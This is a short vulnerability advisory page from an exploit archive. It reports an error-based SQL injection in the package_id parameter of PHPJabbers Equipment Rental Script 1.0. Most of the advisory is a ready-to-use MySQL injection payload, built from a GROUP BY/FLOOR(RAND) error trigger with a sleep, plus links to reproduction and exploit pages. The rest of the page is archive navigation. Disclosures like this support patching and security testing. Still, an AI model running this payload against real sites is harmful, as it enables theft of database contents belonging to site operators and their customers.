Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Equipment Rental Script 1.0 SQL Injection[6]
- Authored by nu11secur1ty[7]
-
Equipment Rental Script version 1.0 suffers from a remote SQL injection vulnerability.
- SHA-256 |
0ba0b1672e1ad0be57f6d8f077920536af11fdbfb040d7ce6901297ef47e3d6d
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/equipment-rental-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
```mysql
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING
MIN(0)#from(select(sleep(20)))a)&cnt=2&date_from=12/9/2023&hour_from=11&minute_from=00&date_to=12/9/2023&hour_to=12&minute_to=00
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Equipment-Rental-Script-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/phpjabbers-equipment-rental-script-10.html)
## Time spent:
00:25:00
File Tags
- ActiveX[18] (932)
- Advisory[19] (82,177)
- Arbitrary[20] (16,247)
- BBS[21] (2,859)
- Bypass[22] (1,743)
- CGI[23] (1,027)
- Code Execution[24] (7,301)
- Conference[25] (680)
- Cracker[26] (842)
- CSRF[27] (3,348)
- DoS[28] (23,519)
- Encryption[29] (2,371)
- Exploit[30] (52,086)
- File Inclusion[31] (4,228)
- File Upload[32] (977)
- Firewall[33] (821)
- Info Disclosure[34] (2,792)
- Intrusion Detection[35] (892)
- Java[36] (3,049)
- JavaScript[37] (860)
- Kernel[38] (6,732)
- Local[39] (14,499)
- Magazine[40] (586)
- Overflow[41] (12,704)
- Perl[42] (1,423)
- PHP[43] (5,152)
- Proof of Concept[44] (2,343)
- Protocol[45] (3,606)
- Python[46] (1,536)
- Remote[47] (30,852)
- Root[48] (3,590)
- Rootkit[49] (509)
- Ruby[50] (612)
- Scanner[51] (1,641)
- Security Tool[52] (7,895)
- Shell[53] (3,195)
- Shellcode[54] (1,216)
- Sniffer[55] (895)
- Spoof[56] (2,209)
- SQL Injection[57] (16,409)
- TCP[58] (2,407)
- Trojan[59] (687)
- UDP[60] (893)
- Virus[61] (666)
- Vulnerability[62] (31,825)
- Web[63] (9,695)
- Whitepaper[64] (3,751)
- x86[65] (962)
- XSS[66] (17,994)
- Other[67]
File Archives
- September 2023[68]
- August 2023[69]
- July 2023[70]
- June 2023[71]
- May 2023[72]
- April 2023[73]
- March 2023[74]
- February 2023[75]
- January 2023[76]
- December 2022[77]
- November 2022[78]
- October 2022[79]
- Older[80]
Systems
- AIX[81] (428)
- Apple[82] (2,005)
- BSD[83] (373)
- CentOS[84] (57)
- Cisco[85] (1,925)
- Debian[86] (6,833)
- Fedora[87] (1,692)
- FreeBSD[88] (1,244)
- Gentoo[89] (4,323)
- HPUX[90] (879)
- iOS[91] (352)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (68)
- Linux[95] (46,676)
- Mac OS X[96] (686)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (485)
- RedHat[100] (13,841)
- Slackware[101] (941)
- Solaris[102] (1,610)
- SUSE[103] (1,444)
- Ubuntu[104] (8,896)
- UNIX[105] (9,306)
- UnixWare[106] (186)
- Windows[107] (6,584)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]
